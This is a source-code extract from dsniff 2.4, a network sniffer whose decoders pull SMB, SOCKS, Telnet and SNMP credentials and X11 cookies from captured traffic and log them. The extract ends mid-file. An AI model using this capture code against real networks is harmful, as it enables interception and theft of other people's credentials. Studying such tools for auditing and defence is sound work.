Dug Song * * $Id: decode_smb.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "decode.h" struct smbhdr { u_char proto[4]; u_char cmd; u_char err[4]; u_char flags1; u_short flags2; u_short pad[6]; u_short tid, pid, uid, mid; }; int decode_smb(u_char *buf, int len, u_char *obuf, int olen) { struct smbhdr *smb; int i, j, k; u_char *p, *q, *end; char *user, *pass; obuf[0] = '\0'; /* Skip NetBIOS session request. */ if (len < 4 || buf[0] != 0x81) return (0); buf += 2; GETSHORT(i, buf); len -= 4; if (len < i) return (0); buf += i; len -= i; end = buf + len; /* Parse SMBs. */ for (p = buf; p < end; p += i) { GETLONG(i, p); if (i > end - p || i < sizeof(*smb) + 32) continue; smb = (struct smbhdr *)p; if (memcmp(smb->proto, "\xffSMB", 4) != 0 || smb->cmd != 0x73) continue; user = pass = NULL; q = (u_char *)(smb + 1); if (*q == 10) { /* Pre NT LM 0.12 */ q += 15; j = pletohs(q); q += 2; if (j > i - (sizeof(*smb) + 15 + 6)) continue; pass = q + 6; user = pass + j; } else if (*q == 13) { /* NT LM 0.12 */ q += 15; j = pletohs(q); q += 2; k = pletohs(q); if (j > i - ((q - p) + 12) || k > i - ((q - p) + 11)) continue; pass = q + 12; user = pass + j + k; } else continue; /* XXX - skip null IPC sessions, etc. */ if (user && pass && strlen(user) && is_ascii_string(pass, j - 1)) { strlcat(obuf, user, olen); strlcat(obuf, " ", olen); strlcat(obuf, pass, olen); strlcat(obuf, "\n", olen); } } return (strlen(obuf)); } dsniff-2.4/decode_sniffer.c0000600000175000017500000000172507254077076015614 0ustar lucianoluciano/* * decode_sniffer.c * * Network Associates Sniffer. * * Copyright (c) 2000 Anonymous * Copyright (c) 2000 Dug Song * * $Id: decode_sniffer.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "base64.h" #include "decode.h" int decode_sniffer(u_char *buf, int len, u_char *obuf, int olen) { u_int i, opcode; if (len < 36 || buf[0] != 5) return (0); opcode = pletohs(&buf[6]); if (opcode == 260) { if (buf[32] == 0) return (strlcpy(obuf, "[]\n", olen)); } else if (opcode == 261) { if (pletohl(&buf[32]) == -1) return (strlcpy(obuf, "[]\n", olen)); } else return (0); buf[len - 3]= '\0'; strtok(&buf[32], "\r\n"); snprintf(obuf, olen, "%s [", &buf[32]); len = strlen(obuf); i = base64_pton(&buf[32], &obuf[len], olen - len - 3); obuf[len + i] = '\0'; strlcat(obuf, "]\n", olen); return (strlen(obuf)); } dsniff-2.4/decode_snmp.c0000600000175000017500000000204407254077076015130 0ustar lucianoluciano/* * decode_snmp.c * * Simple Network Management Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_snmp.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "buf.h" #include "asn1.h" #include "decode.h" int decode_snmp(u_char *buf, int len, u_char *obuf, int olen) { struct buf *b, inbuf, outbuf; u_char *p, vers; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (asn1_type(&inbuf) != ASN1_SEQUENCE) return (0); asn1_len(&inbuf); /* XXX - skip sequence length */ if (asn1_type(&inbuf) != ASN1_INTEGER) return (0); if (asn1_len(&inbuf) != 1) /* XXX - check version length */ return (0); buf_get(&inbuf, &vers, sizeof(vers)); if (asn1_type(&inbuf) != ASN1_STRING) return (0); i = asn1_len(&inbuf); b = buf_tok(&inbuf, NULL, i); p = buf_strdup(b); buf_putf(&outbuf, "[version %d]\n%s\n", vers + 1, p); free(p); buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_socks.c0000600000175000017500000000174707254077076015306 0ustar lucianoluciano/* * decode_socks.c * * NEC SOCKS. * * Copyright (c) 2000 Dug Song * * $Id: decode_socks.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_socks(u_char *buf, int len, u_char *obuf, int olen) { u_char *p; int i, n; p = buf; if (len < 4 || *p++ != 5) /* SOCKS version */ return (0); if ((n = *p++) > len - 5) /* nmethods */ return (0); for (i = 0; i < n; i++) /* USERNAME/PASSWORD method? */ if (p[i] == 2) break; if (i == n) return (0); p += n; if (*p++ != 1) return (0); /* USERNAME/PASSWORD version */ n = *p++; if (n > len - (p - buf)) return (0); memmove(p - 1, p, n); p[n - 1] = '\0'; snprintf(obuf, olen, "%s ", p - 1); p += n; n = *p++; if (n > len - (p - buf)) return (0); memmove(p - 1, p, n); p[n - 1] = '\0'; strlcat(obuf, p - 1, olen); strlcat(obuf, "\n", olen); return (strlen(obuf)); } dsniff-2.4/decode_telnet.c0000600000175000017500000000107507254077077015452 0ustar lucianoluciano/* * decode_telnet.c * * Telnet. * * Copyright (c) 2000 Dug Song * * $Id: decode_telnet.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include "options.h" #include "decode.h" int decode_telnet(u_char *buf, int len, u_char *obuf, int olen) { if ((len = strip_telopts(buf, len)) == 0) return (0); if (!is_ascii_string(buf, len)) return (0); if (strip_lines(buf, Opt_lines) < 2) return (0); strlcpy(obuf, buf, olen); return (strlen(obuf)); } dsniff-2.4/decode_x11.c0000600000175000017500000000123307254077077014564 0ustar lucianoluciano/* * decode_x11.c * * X11. * * Copyright (c) 2000 Dug Song * * $Id: decode_x11.c,v 1.4 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_x11(u_char *buf, int len, u_char *obuf, int olen) { char *p, *q; int i; p = buf + 12; if (strncmp(p, "MIT-MAGIC-COOKIE-1", 18) != 0 || len < 36) return (0); strlcpy(obuf, "MIT-MAGIC-COOKIE-1 ", olen); p += 20; len -= 20; q = obuf + 19; for (i = 0; i < 16 && i < len; i++) sprintf(q + (i * 2), "%.2x", (u_char)p[i]); strlcat(obuf, "\n", olen); return (strlen(obuf)); } dsniff-2.4/rpc.c0000600000175000017500000000441507254077100013424 0ustar lucianoluciano/* * rpc.c * * Copyright (c) 2000 Dug Song * * $Id: rpc.c,v 1.8 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "decode.h" #include "rpc.h" #define XIDMAPSIZE 64 static struct xid_map xid_maps[XIDMAPSIZE]; static int xid_map_next = 0; static int xid_map_hint = 0; /* xid_map adapted from tcpdump's print-nfs.c */ void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, u_int32_t proc, void *data) { struct xid_map *mp; mp = &xid_maps[xid_map_next]; if (++xid_map_next >= XIDMAPSIZE) xid_map_next = 0; mp->xid = xid; mp->prog = prog; mp->vers = vers; mp->proc = proc; mp->data = data; } struct xid_map * xid_map_find(int xid) { struct xid_map *mp; int i; /* Start searching from where we last left off. */ i = xid_map_hint; do { mp = &xid_maps[i]; if (mp->xid == xid) { /* match */ xid_map_hint = i; return (mp); } if (++i >= XIDMAPSIZE) i = 0; } while (i != xid_map_hint); return (NULL); } int rpc_decode(u_char *buf, int len, struct rpc_msg *msg) { XDR xdrs; u_int32_t fraghdr; u_char *p, *tmp; int stat, tmplen; if (len < 20) return (0); p = buf + 4; /* If not recognizably RPC, try TCP record defragmentation */ if (pntohl(p) != CALL && pntohl(p) != REPLY) { tmp = buf; tmplen = 0; for (;;) { fraghdr = pntohl(tmp); if (FRAGLEN(fraghdr) + 4 > len) return (0); len -= 4; memmove(tmp, tmp + 4, len); tmplen += FRAGLEN(fraghdr); if (LASTFRAG(fraghdr)) break; tmp += FRAGLEN(fraghdr); len -= FRAGLEN(fraghdr); if (len < 4) return (0); } len = tmplen; } /* Decode RPC message. */ memset(msg, 0, sizeof(*msg)); if (ntohl(((struct rpc_msg *)buf)->rm_direction) == CALL) { xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (!xdr_callmsg(&xdrs, msg)) { xdr_destroy(&xdrs); return (0); } } else if (ntohl(((struct rpc_msg *)buf)->rm_direction) == REPLY) { msg->acpted_rply.ar_results.proc = (xdrproc_t) xdr_void; xdrmem_create(&xdrs, buf, len, XDR_DECODE); if (!xdr_replymsg(&xdrs, msg)) { xdr_destroy(&xdrs); return (0); } } stat = xdr_getpos(&xdrs); xdr_destroy(&xdrs); return (stat); } dsniff-2.4/record.c0000600000175000017500000000742707254077100014124 0ustar lucianoluciano/* * record.c * * Copyright (c) 2000 Dug Song * * $Id: record.c,v 1.10 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #ifdef HAVE_DB_185_H #define DB_LIBRARY_COMPATIBILITY_API #include #elif HAVE_DB_H #include #endif #include #include "options.h" #include "record.h" struct rec { time_t time; in_addr_t src; in_addr_t dst; u_int proto; u_short sport; u_short dport; struct netobj name; struct netobj data; }; static DB *db; static int xdr_rec(XDR *xdrs, struct rec *rec) { if (xdr_u_long(xdrs, (u_long *)&rec->time) && xdr_u_long(xdrs, (u_long *)&rec->src) && xdr_u_long(xdrs, (u_long *)&rec->dst) && xdr_u_int(xdrs, &rec->proto) && xdr_u_short(xdrs, &rec->sport) && xdr_u_short(xdrs, &rec->dport) && xdr_netobj(xdrs, &rec->name) && xdr_netobj(xdrs, &rec->data)) { return (1); } return (0); } static void record_print(struct rec *rec) { struct tm *tm; char *srcp, *dstp, *protop, tstr[24], spstr[8], dpstr[8]; struct protoent *pr; tm = localtime(&rec->time); strftime(tstr, sizeof(tstr), "%x %X", tm); srcp = libnet_host_lookup(rec->src, Opt_dns); dstp = libnet_host_lookup(rec->dst, Opt_dns); if ((pr = getprotobynumber(rec->proto)) == NULL) protop = "unknown"; else protop = pr->p_name; snprintf(spstr, sizeof(spstr), "%d", rec->sport); snprintf(dpstr, sizeof(dpstr), "%d", rec->dport); printf("-----------------\n"); printf("%s %s %s%s%s -> %s%s%s (%.*s)\n", tstr, protop, srcp, rec->sport ? "." : "", rec->sport ? spstr : "", dstp, rec->dport ? "." : "", rec->dport ? dpstr : "", (int) rec->name.n_len, rec->name.n_bytes); fwrite(rec->data.n_bytes, 1, rec->data.n_len, stdout); printf("\n"); fflush(stdout); } static DBT * record_hash(struct rec *rec) { static DBT key; static u_char hash[16]; MD5_CTX ctx; /* Unique key: src/dst IPs, decode type, decode data. */ MD5Init(&ctx); MD5Update(&ctx, (u_char *) &rec->src, sizeof(rec->src)); MD5Update(&ctx, (u_char *) &rec->dst, sizeof(rec->dst)); MD5Update(&ctx, rec->name.n_bytes, rec->name.n_len); MD5Update(&ctx, rec->data.n_bytes, rec->data.n_len); MD5Final(hash, &ctx); key.data = hash; key.size = sizeof(hash); return (&key); } static int record_save(struct rec *rec) { DBT *key, data; XDR xdrs; u_char buf[2048]; xdrmem_create(&xdrs, buf, sizeof(buf), XDR_ENCODE); if (!xdr_rec(&xdrs, rec)) return (0); data.data = buf; data.size = xdr_getpos(&xdrs); xdr_destroy(&xdrs); key = record_hash(rec); if (db->put(db, key, &data, R_NOOVERWRITE) == 0) db->sync(db, 0); return (1); } void record_dump(void) { DBT key, data; XDR xdrs; struct rec rec; while (db->seq(db, &key, &data, R_NEXT) == 0) { memset(&rec, 0, sizeof(rec)); xdrmem_create(&xdrs, data.data, data.size, XDR_DECODE); if (xdr_rec(&xdrs, &rec)) { record_print(&rec); } xdr_destroy(&xdrs); } } int record_init(char *file) { int flags, mode; if (Opt_read) { flags = O_RDONLY; mode = 0; } else { flags = O_RDWR|O_CREAT; mode = S_IRUSR|S_IWUSR; } if ((db = dbopen(file, flags, mode, DB_BTREE, NULL)) == NULL) return (0); return (1); } int record(in_addr_t src, in_addr_t dst, int proto, u_short sport, u_short dport, char *name, u_char *buf, int len) { struct rec rec; rec.time = time(NULL); rec.src = src; rec.dst = dst; rec.proto = proto; rec.sport = sport; rec.dport = dport; rec.name.n_bytes = name; rec.name.n_len = strlen(name); rec.data.n_bytes = buf; rec.data.n_len = len; if (!Opt_read && !Opt_write) record_print(&rec); record_save(&rec); return (1); } void record_close(void) { db->close(db); } dsniff-2.4/trigger.c0000600000175000017500000003170107254077101014302 0ustar lucianoluciano/* * trigger.c * * Copyright (c) 2000 Dug Song * * $Id: trigger.c,v 1.21 2001/03/15 08:33:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "decode.h" #include "magic.h" #include "options.h" #include "pathnames.h" #include "record.h" #include "tcp_raw.h" #include "trigger.h" struct trigger { int num; struct decode *decode; }; static struct trigger ip_triggers[32]; static struct trigger udp_triggers[512]; static struct trigger tcp_triggers[512]; static struct trigger rpc_triggers[32]; static u_int ip_cnt = 0; static u_int udp_cnt = 0; static u_int tcp_cnt = 0; static u_int rpc_cnt = 0; static char obuf[4096]; static int trigger_compare(const void *a, const void *b) { struct trigger *p, *q; q = (struct trigger *)a; p = (struct trigger *)b; if (p->num < q->num) { return (-1); } else if (p->num > q->num) { return (1); } return (0); } int trigger_set_ip(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_ip: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_ip: proto %d already set", num); return (0); } if (ip_cnt == sizeof(ip_triggers) / sizeof(tr)) { warnx("trigger_set_ip: ip_triggers full"); return (0); } ip_triggers[ip_cnt++] = tr; qsort(&ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_ip: proto %d -> %s", num, name); return (1); } int trigger_set_udp(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_udp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_udp: port %d already set", num); return (0); } if (udp_cnt == sizeof(udp_triggers) / sizeof(tr)) { warnx("trigger_set_udp: udp_triggers full"); return (0); } udp_triggers[udp_cnt++] = tr; qsort(&udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_udp: port %d -> %s", num, name); return (1); } int trigger_set_tcp(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_tcp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_tcp: port %d already set", num); return (0); } if (tcp_cnt == sizeof(tcp_triggers) / sizeof(tr)) { warnx("trigger_set_tcp: tcp_triggers full"); return (0); } tcp_triggers[tcp_cnt++] = tr; qsort(&tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_tcp: port %d -> %s", num, name); return (1); } int trigger_set_rpc(int num, char *name) { struct trigger *t, tr; tr.num = num; if ((tr.decode = getdecodebyname(name)) == NULL) { warnx("trigger_set_tcp: unknown decode: %s", name); return (0); } t = (struct trigger *) bsearch(&tr, &rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (t != NULL) { if (Opt_debug) warnx("trigger_set_rpc: RPC program %d already set", num); return (0); } if (rpc_cnt == sizeof(rpc_triggers) / sizeof(tr)) { warnx("trigger_set_rpc: rpc_triggers full"); return (0); } rpc_triggers[rpc_cnt++] = tr; qsort(&rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (Opt_debug) warnx("trigger_set_rpc: program %d -> %s", num, name); return (1); } static int trigger_set(char *proto, int num, char *name) { if (strcasecmp(proto, "ip") == 0) { return (trigger_set_ip(num, name)); } else if (strcasecmp(proto, "udp") == 0) { return (trigger_set_udp(num, name)); } else if (strcasecmp(proto, "tcp") == 0) { return (trigger_set_tcp(num, name)); } else if (strcasecmp(proto, "rpc") == 0) { return (trigger_set_rpc(num, name)); } else warnx("trigger_set: unknown protocol %s", proto); return (0); } static struct trigger * trigger_set_magic(int proto, int num, u_char *buf, int len) { struct trigger *t, tr; char *name; if ((name = magic_match(buf, len)) == NULL) return (NULL); t = NULL; tr.num = num; if (proto == IPPROTO_UDP) { trigger_set_udp(num, name); if (strcmp(name, "portmap") == 0 || /* XXX - hack */ strcmp(name, "mountd") == 0 || strcmp(name, "yppasswd") == 0) { trigger_set_udp(0 - num, name); } t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); } else if (proto == IPPROTO_TCP) { trigger_set_tcp(num, name); if (strcmp(name, "portmap") == 0 || /* XXX - hack */ strcmp(name, "mountd") == 0 || strcmp(name, "yppasswd") == 0) { trigger_set_tcp(0 - num, name); } t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); } return (t); } void trigger_dump(void) { FILE *f; int i; if ((f = fopen(DSNIFF_SERVICES, "w")) == NULL) { warn("trigger_dump: couldn't open " DSNIFF_SERVICES); return; } fprintf(f, "# $Id: trigger.c,v 1.21 2001/03/15 08:33:05 dugsong Exp $\n" "#\n# Network services, dsniff style\n#\n"); for (i = 0; i < ip_cnt; i++) { fprintf(f, "%s\t\t%d/ip\n", ip_triggers[i].decode->dc_name, ip_triggers[i].num); } for (i = 0; i < udp_cnt; i++) { fprintf(f, "%s\t\t%d/udp\n", udp_triggers[i].decode->dc_name, udp_triggers[i].num); } for (i = 0; i < tcp_cnt; i++) { fprintf(f, "%s\t\t%d/tcp\n", tcp_triggers[i].decode->dc_name, tcp_triggers[i].num); } for (i = 0; i < rpc_cnt; i++) { fprintf(f, "%s\t\t%d/rpc\n", rpc_triggers[i].decode->dc_name, rpc_triggers[i].num); } fclose(f); } void trigger_ip(struct libnet_ip_hdr *ip) { struct trigger *t, tr; u_char *buf; int len; tr.num = ip->ip_p; t = (struct trigger *) bsearch(&tr, &ip_triggers, ip_cnt, sizeof(tr), trigger_compare); if (t == NULL) return; buf = (u_char *)ip + (ip->ip_hl * 4); len = ntohs(ip->ip_len) - (ip->ip_hl * 4); if (Opt_debug) warnx("trigger_ip: decoding proto %d as %s", tr.num, t->decode->dc_name); if ((len = t->decode->dc_func(buf, len, obuf, sizeof(obuf))) > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, ip->ip_p, 0, 0, t->decode->dc_name, obuf, len); } } /* libnids needs a nids_register_udp()... */ void trigger_udp(struct libnet_ip_hdr *ip) { struct trigger *t, tr; struct libnet_udp_hdr *udp; u_char *buf; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_UDP || len < sizeof(*udp)) return; buf = (u_char *)ip + ip_hl; udp = (struct libnet_udp_hdr *)buf; if (len != ntohs(udp->uh_ulen)) return; buf += sizeof(*udp); len -= sizeof(*udp); tr.num = ntohs(udp->uh_dport); t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t == NULL) { tr.num = 0 - (int) ntohs(udp->uh_sport); t = (struct trigger *) bsearch(&tr, &udp_triggers, udp_cnt, sizeof(tr), trigger_compare); if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_UDP, ntohs(udp->uh_dport), buf, len); if (t == NULL) return; } if (Opt_debug) warnx("trigger_udp: decoding port %d as %s", tr.num, t->decode->dc_name); if ((len = t->decode->dc_func(buf, len, obuf, sizeof(obuf))) > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, IPPROTO_UDP, ntohs(udp->uh_sport), ntohs(udp->uh_dport), t->decode->dc_name, obuf, len); } } static void trigger_tcp_half(struct tuple4 *addr, struct half_stream *hs, struct trigger *t) { u_char *buf; int len; buf = hs->data; len = hs->count - hs->offset; if (len == 0 || buf == NULL) return; if (hs->bufsize > len) buf[len] = '\0'; if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, addr->dest, buf, len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp: decoding port %d as %s", addr->dest, t->decode->dc_name); if ((len = t->decode->dc_func(buf, len, obuf, sizeof(obuf))) > 0) { record(addr->saddr, addr->daddr, IPPROTO_TCP, addr->source, addr->dest, t->decode->dc_name, obuf, len); } } hs->collect = 0; } void trigger_tcp(struct tcp_stream *ts, void **conn_save) { struct trigger *ct, *st, tr; tr.num = ts->addr.dest; ct = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); tr.num = 0 - (int) ts->addr.dest; st = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); switch (ts->nids_state) { case NIDS_JUST_EST: if (ct != NULL || Opt_magic) { ts->server.collect = 1; } if (st != NULL) { ts->client.collect = 1; } break; case NIDS_DATA: if ((ct != NULL || Opt_magic) && ts->server.count_new) { if (ts->server.count - ts->server.offset >= Opt_snaplen) { trigger_tcp_half(&ts->addr, &ts->server, ct); } else nids_discard(ts, 0); } else if (st != NULL && ts->client.count_new) { if (ts->client.count - ts->client.offset >= Opt_snaplen) { trigger_tcp_half(&ts->addr, &ts->client, st); } else nids_discard(ts, 0); } break; default: if ((ct != NULL || Opt_magic) && ts->server.count > 0) { trigger_tcp_half(&ts->addr, &ts->server, ct); } if (st != NULL && ts->client.count > 0) { trigger_tcp_half(&ts->addr, &ts->client, st); } break; } } void trigger_tcp_raw(struct libnet_ip_hdr *ip) { struct trigger *t, tr; struct libnet_tcp_hdr *tcp; struct iovec *iov; int len, ip_hl = ip->ip_hl * 4; len = ntohs(ip->ip_len) - ip_hl; if (ip->ip_p != IPPROTO_TCP || len < sizeof(*tcp)) return; tcp = (struct libnet_tcp_hdr *)((u_char *)ip + ip_hl); tr.num = ntohs(tcp->th_dport); t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL) { tr.num = 0 - (int) ntohs(tcp->th_sport); t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL && !Opt_magic) return; } if ((iov = tcp_raw_input(ip, tcp, len)) == NULL) return; if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, ntohs(tcp->th_dport), iov->iov_base, iov->iov_len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp_raw: decoding port %d as %s", tr.num, t->decode->dc_name); len = t->decode->dc_func(iov->iov_base, iov->iov_len, obuf, sizeof(obuf)); if (len > 0) { record(ip->ip_src.s_addr, ip->ip_dst.s_addr, IPPROTO_TCP, ntohs(tcp->th_sport), ntohs(tcp->th_dport), t->decode->dc_name, obuf, len); } } free(iov->iov_base); free(iov); } static void trigger_tcp_raw_callback(in_addr_t src, in_addr_t dst, u_short sport, u_short dport, u_char *buf, int len) { struct trigger *t, tr; tr.num = dport; t = (struct trigger *) bsearch(&tr, &tcp_triggers, tcp_cnt, sizeof(tr), trigger_compare); if (t == NULL && Opt_magic) t = trigger_set_magic(IPPROTO_TCP, dport, buf, len); if (t != NULL) { if (Opt_debug) warnx("trigger_tcp_raw_timeout: " "decoding port %d as %s", tr.num, t->decode->dc_name); if ((len = t->decode->dc_func(buf, len, obuf, sizeof(obuf))) > 0) { record(src, dst, IPPROTO_TCP, sport, dport, t->decode->dc_name, obuf, len); } } } void trigger_tcp_raw_timeout(int signal) { tcp_raw_timeout(TRIGGER_TCP_RAW_TIMEOUT, trigger_tcp_raw_callback); alarm(TRIGGER_TCP_RAW_TIMEOUT); } void trigger_rpc(int program, int proto, int port) { struct trigger *t, tr; tr.num = program; t = (struct trigger *) bsearch(&tr, &rpc_triggers, rpc_cnt, sizeof(tr), trigger_compare); if (t == NULL) return; if (proto == IPPROTO_UDP) { trigger_set_udp(port, t->decode->dc_name); } else if (proto == IPPROTO_TCP) { trigger_set_tcp(port, t->decode->dc_name); } } void trigger_init_magic(char *filename) { magic_init(filename); } void trigger_init_list(char *list) { char *name, *port, *proto = NULL; while ((name = strsep(&list, ",")) != NULL) { if ((port = strsep(&name, "/")) == NULL || (proto = strsep(&name, "=")) == NULL) { errx(1, "trigger_init_list: parse error"); } trigger_set(proto, atoi(port), name); } } void trigger_init_services(char *services) { FILE *f; char *name, *port, *proto, line[1024]; if ((f = fopen(services, "r")) == NULL) errx(1, "couldn't open %s", services); while (fgets(line, sizeof(line), f) != NULL) { if (line[0] == '#' || line[0] == '\n') continue; if ((name = strtok(line, " \t")) == NULL || (port = strtok(NULL, " \t/")) == NULL || (proto = strtok(NULL, " \t#\n")) == NULL) { continue; } trigger_set(proto, atoi(port), name); } fclose(f); } dsniff-2.4/magic.c0000600000175000017500000004300507254077100013716 0ustar lucianoluciano/* * magic.c * * Network application protocol identification, based on file(1) magic. * * Copyright (c) 2000 Dug Song * Copyright (c) 1987 Ian F. Darwin * * This software is not subject to any license of the American Telephone * and Telegraph Company or of the Regents of the University of California. * * Permission is granted to anyone to use this software for any purpose on * any computer system, and to alter it and redistribute it freely, subject * to the following restrictions: * * 1. The author is not responsible for the consequences of use of this * software, no matter how awful, even if they arise from flaws in it. * * 2. The origin of this software must not be misrepresented, either by * explicit claim or by omission. Since few users ever read sources, * credits must appear in the documentation. * * 3. Altered versions must be plainly marked as such, and must not be * misrepresented as being the original software. Since few users * ever read sources, credits must appear in the documentation. * * 4. This notice may not be removed or altered. * * $Id: magic.c,v 1.9 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "options.h" #include "magic.h" #define LOWCASE(p) (isupper((u_char) (p)) ? tolower((u_char) (p)) : (p)) #define INDIR 1 /* if '>(...)' appears, */ #define UNSIGNED 2 /* comparison is unsigned */ #define ADD 4 /* if '>&' appears, */ #define BYTE 1 #define SHORT 2 #define LONG 4 #define STRING 5 #define DATE 6 #define BESHORT 7 #define BELONG 8 #define BEDATE 9 #define LESHORT 10 #define LELONG 11 #define LEDATE 12 struct magic { short flag; short cont_level; struct { int8_t type; /* byte short long */ int32_t offset; /* offset from indirection */ } in; int32_t offset; /* offset to magic number. */ u_char reln; /* relation (0=eq, '>'=gt, etc.) */ int8_t type; /* int, short, long or string */ char vallen; /* length of string value, if any */ union VALUETYPE { u_char b; u_short h; u_int32_t l; char s[32]; u_char hs[2]; /* 2 bytes of a fixed-endian "short" */ u_char hl[4]; /* 4 bytes of a fixed-endian "long" */ } value; /* either number or string */ u_int32_t mask; /* mask before comparison with value */ char desc[50]; /* description */ }; static char *Magictypes[12] = { "byte", "short", "null", "long", "string", "date", "beshort", "belong", "bedate", "leshort", "lelong", "ledate", }; static struct magic Magic[512]; static int Magiccnt = 0; static int Magicmax = sizeof(Magic) / sizeof(Magic[0]); static char Match[128]; static void eatsize(char **p) { char *l = *p; if (LOWCASE(*l) == 'u') l++; switch (LOWCASE(*l)) { case 'l': /* long */ case 's': /* short */ case 'h': /* short */ case 'b': /* char/byte */ case 'c': /* char/byte */ l++; /*FALLTHROUGH*/ default: break; } *p = l; } /* Single hex char to int; -1 if not a hex char. */ static int hextoint(int c) { if (!isascii((u_char) c)) return (-1); if (isdigit((u_char) c)) return (c - '0'); if ((c >= 'a') && (c <= 'f')) return (c + 10 - 'a'); if ((c >= 'A') && (c <= 'F')) return (c + 10 - 'A'); return (-1); } /* * Convert a string containing C character escapes. Stop at an unescaped * space or tab. * Copy the converted version to "p", returning its length in *slen. * Return updated scan pointer as function result. */ static char * getstr(char *s, char *p, int plen, int *slen) { char *origs = s, *origp = p; char *pmax = p + plen - 1; int c; int val; while ((c = *s++) != '\0') { if (isspace((u_char) c)) break; if (p >= pmax) { warnx("getstr: string too long: %s", origs); break; } if (c == '\\') { switch ((c = *s++)) { case '\0': goto out; default: *p++ = (char) c; break; case 'n': *p++ = '\n'; break; case 'r': *p++ = '\r'; break; case 'b': *p++ = '\b'; break; case 't': *p++ = '\t'; break; case 'f': *p++ = '\f'; break; case 'v': *p++ = '\v'; break; /* \ and up to 3 octal digits */ case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': val = c - '0'; c = *s++; /* try for 2 */ if (c >= '0' && c <= '7') { val = (val << 3) | (c - '0'); c = *s++; /* try for 3 */ if (c >= '0' && c <= '7') val = (val << 3) | (c - '0'); else --s; } else --s; *p++ = (char) val; break; /* \x and up to 2 hex digits */ case 'x': val = 'x'; /* Default if no digits */ c = hextoint(*s++); /* Get next char */ if (c >= 0) { val = c; c = hextoint(*s++); if (c >= 0) val = (val << 4) + c; else --s; } else --s; *p++ = (char) val; break; } } else *p++ = (char) c; } out: *p = '\0'; *slen = p - origp; return (s); } /* Extend the sign bit if the comparison is to be signed. */ static u_int32_t signextend(struct magic *m, u_int32_t v) { if (!(m->flag & UNSIGNED)) return (v); switch(m->type) { /* * Do not remove the casts below. They are * vital. When later compared with the data, * the sign extension must have happened. */ case BYTE: v = (char) v; break; case SHORT: case BESHORT: case LESHORT: v = (short) v; break; case DATE: case BEDATE: case LEDATE: case LONG: case BELONG: case LELONG: v = (int32_t) v; break; case STRING: break; default: warnx("sign_extend: can't happen: m->type = %d", m->type); return (-1); } return (v); } /* * Read a numeric value from a pointer, into the value union of a magic * pointer, according to the magic type. Update the string pointer to point * just after the number read. Return 0 for success, non-zero for failure. */ static int getvalue(struct magic *m, char **p) { int slen; if (m->type == STRING) { *p = getstr(*p, m->value.s, sizeof(m->value.s), &slen); m->vallen = slen; } else if (m->reln != 'x') { m->value.l = signextend(m, strtoul(*p, p, 0)); eatsize(p); } return (0); } #define SZOF(a) (sizeof(a) / sizeof(a[0])) static void mdump(struct magic *m) { static char *typ[] = { "invalid", "byte", "short", "invalid", "long", "string", "date", "beshort", "belong", "bedate", "leshort", "lelong", "ledate" }; (void) fputc('[', stderr); (void) fprintf(stderr, ">>>>>>>> %d" + 